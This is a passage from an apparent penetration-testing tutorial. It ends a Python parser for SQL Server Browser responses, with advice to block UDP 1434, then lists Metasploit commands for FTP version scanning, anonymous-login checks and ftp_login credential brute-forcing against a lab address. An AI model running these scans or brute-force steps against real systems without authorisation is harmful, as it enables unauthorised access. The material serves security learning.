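    "ServerName;WIN2K3;InstanceName;SQLEXPRESS;IsClustered;No;Version;9.00.1399.06;"
    "tcp;49170;np;\\\\WIN2K3\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;")

if __name__ == "__main__":
    for inst in parse_svr_resp(SAMPLE_SVR_RESP):
        print(inst)
    print(tcp_ports(parse_svr_resp(SAMPLE_SVR_RESP)))
```

The answer is unauthenticated and also leaks the build number in Version, which is why a firewall that allows UDP 1434 through gives away the instance list to anyone who asks; blocking it breaks nothing for clients that already know the port.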
12. FTP Scan
ftp version scan
- use auxiliary/scanner/ftp/ftp_version
- use auxiliary/scanner/ftp/anonymous
- use auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ [tab]
- Display all 479 possibilities? (y or n)
Query version information (banner grab)
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(scanner/ftp/ftp_version) > set RHOSTS 10.10.10.132
msf auxiliary(scanner/ftp/ftp_version) > run
Whether anonymous login is allowed
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(scanner/ftp/anonymous) > set RHOSTS 10.10.10.132
msf auxiliary(scanner/ftp/anonymous) > run
Brute force (takes the same USERPASS_FILE / USER_FILE / PASS_FILE options as ssh_login above)
use auxiliary/scanner/ftp/ftp_login